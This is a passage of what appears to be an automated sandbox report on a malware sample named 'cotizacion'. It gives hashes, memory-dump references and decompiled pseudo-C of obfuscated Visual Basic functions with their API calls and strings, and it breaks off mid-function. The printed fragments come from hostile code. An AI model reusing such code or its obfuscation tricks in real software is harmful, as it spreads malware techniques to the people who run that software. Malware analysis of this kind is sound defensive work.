Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0485135b75a5d1b2484576cebe5e5999e83d61175328e0105d51581c69b98f0
Instruction ID: ab328a06c5055edb0159bb57451060eb93e3f38a11cdec61f4f31fe0a985fb28
Opcode Fuzzy Hash: e0485135b75a5d1b2484576cebe5e5999e83d61175328e0105d51581c69b98f0
Instruction Fuzzy Hash: E6B012303C80099A930043D48C024A12190E340FC43244C33FE50C32B4CA1CCC44852D

Uniqueness

Uniqueness Score: -1.00%

Function 00411508, Relevance: .0, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f3a73b8aafb15b5284813e92f00e7f7377f7c3444c118584beaef11e82ed72
Instruction ID: d24fa2cf5fc5c759fccda5661ff7398a1c559112340d9d9767ceefc0e9b1e698
Opcode Fuzzy Hash: e1f3a73b8aafb15b5284813e92f00e7f7377f7c3444c118584beaef11e82ed72
Instruction Fuzzy Hash: 82B012303C8142AA572043DC5C018A12181D380FD43244C33FD11C32B1DB29DE80423D

Uniqueness

Uniqueness Score: -1.00%

Function 00411290, Relevance: .0, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99d384599db7a9bcdb397e022e1f84e1d5a5672d129d0a7c6d4c3896448a9c4d
Instruction ID: bdc4b36ad9a76796898d69c39432fe1294972f25cc2d4f5c1ee40a3177de67bd
Opcode Fuzzy Hash: 99d384599db7a9bcdb397e022e1f84e1d5a5672d129d0a7c6d4c3896448a9c4d
Instruction Fuzzy Hash: 6DB092303841059A570043985C019A51290A204B803A44972F920E21B0CA788A808229

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00415993, Relevance: 58.0, APIs: 28, Strings: 5, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00415993(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				void* _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v60;
				char _v76;
				char _v92;
				char _v108;
				char* _v132;
				char _v140;
				intOrPtr _v148;
				char _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				intOrPtr* _v204;
				signed int _v208;
				signed int _t120;
				signed int _t131;
				char* _t138;
				char* _t139;
				signed int _t143;
				char* _t147;
				signed int _t150;
				signed int _t156;
				signed int _t161;
				signed int* _t165;
				intOrPtr _t182;
				long long* _t183;
				long long _t196;

				_t196 = __fp0;
				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t182;
				L004016F0();
				_v12 = _t182;
				_v8 = 0x401598;
				_v132 = L"8-8-8";
				_v140 = 8;
				_t165 =  &_v60;
				L004018A0();
				_push( &_v60);
				_push( &_v76);
				L004017E6();
				_v148 = 8;
				_v156 = 0x8002;
				_push( &_v76);
				_t120 =  &_v156;
				_push(_t120);
				L00401828();
				_v160 = _t120;
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L00401942();
				_t183 = _t182 + 0xc;
				if(_v160 != 0) {
					if( *0x4183d8 != 0) {
						_v188 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v188 = 0x4183d8;
					}
					_v160 =  *_v188;
					_t156 =  *((intOrPtr*)( *_v160 + 0x4c))(_v160,  &_v40);
					asm("fclex");
					_v164 = _t156;
					if(_v164 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x4116c4);
						_push(_v160);
						_push(_v164);
						L00401906();
						_v192 = _t156;
					}
					_v168 = _v40;
					_t161 =  *((intOrPtr*)( *_v168 + 0x24))(_v168, L"samtaleemnetsrhes", L"rebslagerierneshand",  &_v36);
					asm("fclex");
					_v172 = _t161;
					if(_v172 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x24);
						_push(0x411974);
						_push(_v168);
						_push(_v172);
						L00401906();
						_v196 = _t161;
					}
					_v180 = _v36;
					_v36 = _v36 & 0x00000000;
					L00401882();
					_t165 =  &_v40;
					L004018AC();
				}
				_push( &_v60);
				L004017DA();
				_push( &_v60);
				asm("fld1");
				_push(_t165);
				_push(_t165);
				 *_t183 = _t196;
				_push(0x411988);
				_push( &_v76);
				L004017E0();
				_push( &_v92);
				L004017DA();
				_v132 = 1;
				_v140 = 2;
				_push( &_v76);
				_push( &_v92);
				_push( &_v140);
				_t131 =  &_v108;
				_push(_t131);
				L004018E2();
				_push(_t131);
				L00401828();
				_v160 = _t131;
				_push( &_v108);
				_push( &_v76);
				_push( &_v92);
				_push( &_v60);
				_push(4);
				L00401942();
				if(_v160 != 0) {
					_t143 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v40);
					asm("fclex");
					_v160 = _t143;
					if(_v160 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x41017c);
						_push(_a4);
						_push(_v160);
						L00401906();
						_v200 = _t143;
					}
					if( *0x4183d8 != 0) {
						_v204 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v204 = 0x4183d8;
					}
					_v164 =  *_v204;
					_v184 = _v40;
					_v40 = _v40 & 0x00000000;
					_t147 =  &_v44;
					L00401888();
					_t150 =  *((intOrPtr*)( *_v164 + 0x40))(_v164, _t147, _t147, _v184, L"UNSERIALIZABLE");
					asm("fclex");
					_v168 = _t150;
					if(_v168 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x4116c4);
						_push(_v164);
						_push(_v168);
						L00401906();
						_v208 = _t150;
					}
					L004018AC();
				}
				_push( &_v60);
				L004017DA();
				_t138 =  &_v60;
				_push(_t138);
				L004017D4();
				_v160 =  ~(0 | _t138 != 0x0000ffff);
				L00401912();
				_t139 = _v160;
				if(_t139 != 0) {
					_v132 = L"EXOCRINOLOGY";
					_v140 = 8;
					L004018A0();
					_push(2);
					_t139 =  &_v60;
					_push(_t139);
					L004018A6();
					_v28 = _t196;
					L00401912();
				}
				asm("wait");
				_push(0x415d7f);
				L00401924();
				return _t139;
			}

0x00415993
0x00415998
0x004159a3
0x004159a4
0x004159b0
0x004159b8
0x004159bb
0x004159c2
0x004159c9
0x004159d9
0x004159dc
0x004159e4
0x004159e8
0x004159e9
0x004159ee
0x004159f8
0x00415a05
0x00415a06
0x00415a0c
0x00415a0d
0x00415a12
0x00415a1c
0x00415a20
0x00415a21
0x00415a23
0x00415a28
0x00415a34
0x00415a41
0x00415a5e
0x00415a43
0x00415a43
0x00415a48
0x00415a4d
0x00415a52
0x00415a52
0x00415a70
0x00415a88
0x00415a8b
0x00415a8d
0x00415a9a
0x00415abc
0x00415a9c
0x00415a9c
0x00415a9e
0x00415aa3
0x00415aa9
0x00415aaf
0x00415ab4
0x00415ab4
0x00415ac6
0x00415ae8
0x00415aeb
0x00415aed
0x00415afa
0x00415b1c
0x00415afc
0x00415afc
0x00415afe
0x00415b03
0x00415b09
0x00415b0f
0x00415b14
0x00415b14
0x00415b26
0x00415b2c
0x00415b39
0x00415b3e
0x00415b41
0x00415b41
0x00415b49
0x00415b4a
0x00415b52
0x00415b53
0x00415b55
0x00415b56
0x00415b57
0x00415b5a
0x00415b62
0x00415b63
0x00415b6b
0x00415b6c
0x00415b71
0x00415b78
0x00415b85
0x00415b89
0x00415b90
0x00415b91
0x00415b94
0x00415b95
0x00415b9a
0x00415b9b
0x00415ba0
0x00415baa
0x00415bae
0x00415bb2
0x00415bb6
0x00415bb7
0x00415bb9
0x00415bca
0x00415bdc
0x00415be2
0x00415be4
0x00415bf1
0x00415c13
0x00415bf3
0x00415bf3
0x00415bf8
0x00415bfd
0x00415c00
0x00415c06
0x00415c0b
0x00415c0b
0x00415c21
0x00415c3e
0x00415c23
0x00415c23
0x00415c28
0x00415c2d
0x00415c32
0x00415c32
0x00415c50
0x00415c59
0x00415c5f
0x00415c6e
0x00415c72
0x00415c86
0x00415c89
0x00415c8b
0x00415c98
0x00415cba
0x00415c9a
0x00415c9a
0x00415c9c
0x00415ca1
0x00415ca7
0x00415cad
0x00415cb2
0x00415cb2
0x00415cc4
0x00415cc4
0x00415ccc
0x00415ccd
0x00415cd2
0x00415cd5
0x00415cd6
0x00415ce6
0x00415cf0
0x00415cf5
0x00415cfe
0x00415d00
0x00415d07
0x00415d1a
0x00415d1f
0x00415d21
0x00415d24
0x00415d25
0x00415d2a
0x00415d30
0x00415d30
0x00415d35
0x00415d36
0x00415d79
0x00415d7e

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 004159B0
__vbaVarDup.MSVBVM60 ref: 004159DC
#542.MSVBVM60(?,?), ref: 004159E9
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00415A0D
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00415A23
__vbaNew2.MSVBVM60(004116D4,004183D8), ref: 00415A4D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,0000004C), ref: 00415AAF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411974,00000024), ref: 00415B0F
__vbaStrMove.MSVBVM60(00000000,?,00411974,00000024), ref: 00415B39
__vbaFreeObj.MSVBVM60(00000000,?,00411974,00000024), ref: 00415B41
#610.MSVBVM60(?), ref: 00415B4A
#661.MSVBVM60(?,00411988,?,?,?,?), ref: 00415B63
#610.MSVBVM60(?,?,00411988,?,?,?,?), ref: 00415B6C
__vbaVarAdd.MSVBVM60(?,00000002,?,?), ref: 00415B95
__vbaVarTstNe.MSVBVM60(00000000,?,00000002,?,?), ref: 00415B9B
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00000000,?,00000002,?,?), ref: 00415BB9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041017C,00000160), ref: 00415C06
__vbaNew2.MSVBVM60(004116D4,004183D8), ref: 00415C2D
__vbaObjSet.MSVBVM60(?,?,UNSERIALIZABLE), ref: 00415C72
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000040), ref: 00415CAD
__vbaFreeObj.MSVBVM60(00000000,?,004116C4,00000040), ref: 00415CC4
#610.MSVBVM60(?,00411988,?,?,?,?), ref: 00415CCD
#557.MSVBVM60(?,?,00411988,?,?,?,?), ref: 00415CD6
__vbaFreeVar.MSVBVM60(?,?,00411988,?,?,?,?), ref: 00415CF0
__vbaVarDup.MSVBVM60(?,?), ref: 00415D1A
#600.MSVBVM60(?,00000002), ref: 00415D25
__vbaFreeVar.MSVBVM60(?,00000002), ref: 00415D30
__vbaFreeStr.MSVBVM60(00415D7F,?,?,00411988,?,?,?,?), ref: 00415D79

Strings

UNSERIALIZABLE, xrefs: 00415C63
EXOCRINOLOGY, xrefs: 00415D00
8-8-8, xrefs: 004159C2
rebslagerierneshand, xrefs: 00415AD0
samtaleemnetsrhes, xrefs: 00415AD5

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$#610$ListNew2$#542#557#600#661ChkstkMove
String ID: 8-8-8$EXOCRINOLOGY$UNSERIALIZABLE$rebslagerierneshand$samtaleemnetsrhes
API String ID: 1830445602-4259344998
Opcode ID: 96e26f14bbb09a00edf492e54924da4a98f5c5364cbcec82bb491f13ac66590d
Instruction ID: 510641c4ee0afc06dfa3f3843ad748b244af4f53101982740560cb60f95694ac
Opcode Fuzzy Hash: 96e26f14bbb09a00edf492e54924da4a98f5c5364cbcec82bb491f13ac66590d
Instruction Fuzzy Hash: 76A1D57191021CEFDB10EBA1CC45BDEBBB8BF04704F5081AAE109B61A1DB795AC9CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00416365, Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00416365(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v40;
				short _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v60;
				char _v68;
				char _v84;
				char* _v108;
				intOrPtr _v116;
				intOrPtr _v124;
				char _v132;
				void* _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				intOrPtr _v156;
				intOrPtr* _v160;
				signed int _v164;
				signed int _v168;
				signed int _t74;
				short _t82;
				signed int _t85;
				signed int _t91;
				signed int _t96;
				intOrPtr _t121;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t121;
				L004016F0();
				_v12 = _t121;
				_v8 = 0x401640;
				_v60 = 0xe;
				_v68 = 2;
				_t74 =  &_v68;
				_push(_t74);
				L004017BC();
				L00401882();
				_push(_t74);
				_push(L"Out of string space");
				L0040184C();
				asm("sbb eax, eax");
				_v136 =  ~( ~( ~_t74));
				L00401924();
				L00401912();
				if(_v136 != 0) {
					_v108 = L"Statscheferstronhi8";
					_v116 = 8;
					L004018A0();
					_push( &_v68);
					_push( &_v84);
					L004017B6();
					L004018E8();
					L00401912();
				}
				_v108 = L"8-8-8";
				_v116 = 8;
				L004018A0();
				_push( &_v68);
				_push( &_v84);
				L004017E6();
				_v124 = 8;
				_v132 = 0x8002;
				_push( &_v84);
				_t82 =  &_v132;
				_push(_t82);
				L00401828();
				_v136 = _t82;
				_push( &_v84);
				_push( &_v68);
				_push(2);
				L00401942();
				_t85 = _v136;
				if(_t85 != 0) {
					if( *0x4183d8 != 0) {
						_v160 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v160 = 0x4183d8;
					}
					_v136 =  *_v160;
					_t91 =  *((intOrPtr*)( *_v136 + 0x4c))(_v136,  &_v52);
					asm("fclex");
					_v140 = _t91;
					if(_v140 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x4116c4);
						_push(_v136);
						_push(_v140);
						L00401906();
						_v164 = _t91;
					}
					_v144 = _v52;
					_t96 =  *((intOrPtr*)( *_v144 + 0x24))(_v144, L"Dedications3", L"Lumskes6",  &_v48);
					asm("fclex");
					_v148 = _t96;
					if(_v148 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0x24);
						_push(0x411974);
						_push(_v144);
						_push(_v148);
						L00401906();
						_v168 = _t96;
					}
					_t85 = _v48;
					_v156 = _t85;
					_v48 = _v48 & 0x00000000;
					L00401882();
					L004018AC();
				}
				_v44 = 0x2a89;
				_push(0x4165dd);
				L00401924();
				L00401912();
				return _t85;
			}

0x0041636a
0x00416375
0x00416376
0x00416382
0x0041638a
0x0041638d
0x00416394
0x0041639b
0x004163a2
0x004163a5
0x004163a6
0x004163b0
0x004163b5
0x004163b6
0x004163bb
0x004163c2
0x004163c8
0x004163d2
0x004163da
0x004163e8
0x004163ea
0x004163f1
0x004163fe
0x00416406
0x0041640a
0x0041640b
0x00416416
0x0041641e
0x0041641e
0x00416423
0x0041642a
0x00416437
0x0041643f
0x00416443
0x00416444
0x00416449
0x00416450
0x0041645a
0x0041645b
0x0041645e
0x0041645f
0x00416464
0x0041646e
0x00416472
0x00416473
0x00416475
0x0041647d
0x00416486
0x00416493
0x004164b0
0x00416495
0x00416495
0x0041649a
0x0041649f
0x004164a4
0x004164a4
0x004164c2
0x004164da
0x004164dd
0x004164df
0x004164ec
0x0041650e
0x004164ee
0x004164ee
0x004164f0
0x004164f5
0x004164fb
0x00416501
0x00416506
0x00416506
0x00416518
0x0041653a
0x0041653d
0x0041653f
0x0041654c
0x0041656e
0x0041654e
0x0041654e
0x00416550
0x00416555
0x0041655b
0x00416561
0x00416566
0x00416566
0x00416575
0x00416578
0x0041657e
0x0041658b
0x00416593
0x00416593
0x00416598
0x0041659e
0x004165cf
0x004165d7
0x004165dc

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00416382
#651.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004163A6
__vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004163B0
__vbaStrCmp.MSVBVM60(Out of string space,00000000,00000002), ref: 004163BB
__vbaFreeStr.MSVBVM60(Out of string space,00000000,00000002), ref: 004163D2
__vbaFreeVar.MSVBVM60(Out of string space,00000000,00000002), ref: 004163DA
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 004163FE
#666.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 0041640B
__vbaVarMove.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 00416416
__vbaFreeVar.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 0041641E
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 00416437
#542.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 00416444
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,00000002,?,?,?,?,?,?,?,?,?,Out of string space), ref: 0041645F
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?,?,?,?,00000002), ref: 00416475
__vbaNew2.MSVBVM60(004116D4,004183D8), ref: 0041649F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,0000004C), ref: 00416501
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411974,00000024), ref: 00416561
__vbaStrMove.MSVBVM60(00000000,?,00411974,00000024), ref: 0041658B
__vbaFreeObj.MSVBVM60(00000000,?,00411974,00000024), ref: 00416593
__vbaFreeStr.MSVBVM60(004165DD), ref: 004165CF
__vbaFreeVar.MSVBVM60(004165DD), ref: 004165D7

Strings

Lumskes6, xrefs: 00416522
Dedications3, xrefs: 00416527
Out of string space, xrefs: 004163B6
8-8-8, xrefs: 00416423
Statscheferstronhi8, xrefs: 004163EA

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$Free$Move$CheckHresult$#542#651#666ChkstkListNew2
String ID: 8-8-8$Dedications3$Lumskes6$Out of string space$Statscheferstronhi8
API String ID: 2969453677-2753518913
Opcode ID: e43cc2ce545865c626e8eb565934338f84ddd9ecd227406003a61cf13a9aeab1
Instruction ID: e3b24c1242cf6614bdcf5f77135783f2822b30ccc1b2a468ab7b5e3d0b049709
Opcode Fuzzy Hash: e43cc2ce545865c626e8eb565934338f84ddd9ecd227406003a61cf13a9aeab1
Instruction Fuzzy Hash: 2A51E871D10229DBDB10EFA1CC45BEEB7B8BF04704F5081AAE149B71A1DB785A89CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00416B2E, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00416B2E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				char* _v100;
				intOrPtr _v108;
				intOrPtr _v132;
				intOrPtr _v140;
				void* _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				void* _t75;
				char* _t76;
				short _t77;
				signed int _t83;
				signed int _t89;
				void* _t117;
				void* _t119;
				intOrPtr _t120;

				_t120 = _t119 - 0xc;
				 *[fs:0x0] = _t120;
				L004016F0();
				_v16 = _t120;
				_v12 = 0x401698;
				_v8 = 0;
				_t75 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4016f6, _t117);
				_push(2);
				_push("ABC");
				_push(0x411a94);
				_push(0);
				L0040182E();
				if(_t75 != 3) {
					_v68 = _a4;
					_v76 = 9;
					_v100 = L"bucketeer";
					_v108 = 8;
					_v132 = 0x498b97;
					_v140 = 3;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"YxNVQiKDdS8jUWPTmdnm0qt5ZhOCXQ1Dg81");
					_push(_v36);
					L004018FA();
					_t120 = _t120 + 0x3c;
				}
				_v52 = 0x98e72e79;
				_v60 = 3;
				_t76 =  &_v60;
				_push(_t76);
				L00401798();
				_v160 =  ~(0 | _t76 != 0x0000ffff);
				L00401912();
				_t77 = _v160;
				if(_t77 != 0) {
					if( *0x4183d8 != 0) {
						_v188 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v188 = 0x4183d8;
					}
					_v160 =  *_v188;
					_t83 =  *((intOrPtr*)( *_v160 + 0x1c))(_v160,  &_v40);
					asm("fclex");
					_v164 = _t83;
					if(_v164 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4116c4);
						_push(_v160);
						_push(_v164);
						L00401906();
						_v192 = _t83;
					}
					_v168 = _v40;
					_v68 = 0x80020004;
					_v76 = 0xa;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t89 =  *((intOrPtr*)( *_v168 + 0x54))(_v168, 0x10,  &_v44);
					asm("fclex");
					_v172 = _t89;
					if(_v172 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x411818);
						_push(_v168);
						_push(_v172);
						L00401906();
						_v196 = _t89;
					}
					_v184 = _v44;
					_v44 = _v44 & 0x00000000;
					_v52 = _v184;
					_v60 = 9;
					_t77 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v32);
					L0040191E();
					L004018AC();
					L00401912();
				}
				_push(1);
				L00401792();
				if(_t77 != 0x800000) {
					L00401870();
				}
				_v28 =  *0x401690;
				asm("wait");
				_push(0x416dd2);
				L004018AC();
				L004018AC();
				return _t77;
			}

0x00416b31
0x00416b40
0x00416b4c
0x00416b54
0x00416b57
0x00416b5e
0x00416b6d
0x00416b70
0x00416b72
0x00416b77
0x00416b7c
0x00416b7e
0x00416b86
0x00416b8b
0x00416b8e
0x00416b95
0x00416b9c
0x00416ba3
0x00416baa
0x00416bb4
0x00416bb7
0x00416bc1
0x00416bc2
0x00416bc3
0x00416bc4
0x00416bc5
0x00416bc8
0x00416bd2
0x00416bd3
0x00416bd4
0x00416bd5
0x00416bd6
0x00416bd9
0x00416be6
0x00416be7
0x00416be8
0x00416be9
0x00416bea
0x00416bec
0x00416bf1
0x00416bf4
0x00416bf9
0x00416bf9
0x00416bfc
0x00416c03
0x00416c0a
0x00416c0d
0x00416c0e
0x00416c1e
0x00416c28
0x00416c2d
0x00416c36
0x00416c43
0x00416c60
0x00416c45
0x00416c45
0x00416c4a
0x00416c4f
0x00416c54
0x00416c54
0x00416c72
0x00416c8a
0x00416c8d
0x00416c8f
0x00416c9c
0x00416cbe
0x00416c9e
0x00416c9e
0x00416ca0
0x00416ca5
0x00416cab
0x00416cb1
0x00416cb6
0x00416cb6
0x00416cc8
0x00416cce
0x00416cd5
0x00416ce3
0x00416ced
0x00416cee
0x00416cef
0x00416cf0
0x00416cff
0x00416d02
0x00416d04
0x00416d11
0x00416d33
0x00416d13
0x00416d13
0x00416d15
0x00416d1a
0x00416d20
0x00416d26
0x00416d2b
0x00416d2b
0x00416d3d
0x00416d43
0x00416d4d
0x00416d50
0x00416d59
0x00416d5a
0x00416d64
0x00416d65
0x00416d66
0x00416d67
0x00416d68
0x00416d6a
0x00416d6d
0x00416d75
0x00416d7d
0x00416d7d
0x00416d82
0x00416d84
0x00416d8e
0x00416d90
0x00416d90
0x00416d9b
0x00416d9e
0x00416d9f
0x00416dc4
0x00416dcc
0x00416dd1

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00416B4C
__vbaInStr.MSVBVM60(00000000,00411A94,ABC,00000002,?,?,?,?,004016F6), ref: 00416B7E
__vbaChkstk.MSVBVM60 ref: 00416BB7
__vbaChkstk.MSVBVM60 ref: 00416BC8
__vbaChkstk.MSVBVM60 ref: 00416BD9
__vbaLateMemCall.MSVBVM60(?,YxNVQiKDdS8jUWPTmdnm0qt5ZhOCXQ1Dg81,00000003), ref: 00416BF4
#561.MSVBVM60(00000003), ref: 00416C0E
__vbaFreeVar.MSVBVM60(00000003), ref: 00416C28
__vbaNew2.MSVBVM60(004116D4,004183D8,00000003), ref: 00416C4F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,0000001C), ref: 00416CB1
__vbaChkstk.MSVBVM60(?), ref: 00416CE3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411818,00000054), ref: 00416D26
__vbaChkstk.MSVBVM60(00000000,?,00411818,00000054), ref: 00416D5A
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 00416D6D
__vbaFreeObj.MSVBVM60(?,00000000), ref: 00416D75
__vbaFreeVar.MSVBVM60(?,00000000), ref: 00416D7D
#589.MSVBVM60(00000001,00000003), ref: 00416D84
__vbaEnd.MSVBVM60(00000001,00000003), ref: 00416D90
__vbaFreeObj.MSVBVM60(00416DD2,00000001,00000003), ref: 00416DC4
__vbaFreeObj.MSVBVM60(00416DD2,00000001,00000003), ref: 00416DCC

Strings

ABC, xrefs: 00416B72
bucketeer, xrefs: 00416B95
YxNVQiKDdS8jUWPTmdnm0qt5ZhOCXQ1Dg81, xrefs: 00416BEC

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$Chkstk$Free$CheckHresultLate$#561#589CallNew2
String ID: ABC$YxNVQiKDdS8jUWPTmdnm0qt5ZhOCXQ1Dg81$bucketeer
API String ID: 867805743-4092157262
Opcode ID: fb4d6a53fba175a0f33af4ef0621cca682c1b9992e95e8ad398b5609a2829474
Instruction ID: 2f934aa9295113fbadf8b94bfb753e08b7e60388e0eb322fc2d851611b7bca69
Opcode Fuzzy Hash: fb4d6a53fba175a0f33af4ef0621cca682c1b9992e95e8ad398b5609a2829474
Instruction Fuzzy Hash: 4D613671A00218AFDB11EF94CC46BDDBBB1AF05704F1044AAF508BB2A1C7B99AC58F49

Uniqueness

Uniqueness Score: -1.00%

Function 00415287, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00415287(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int __fp0) {
				intOrPtr _v8;
				signed int* _v12;
				signed int _v24;
				void* _v28;
				char _v32;
				signed int _v40;
				char _v48;
				void* _v68;
				signed int _v72;
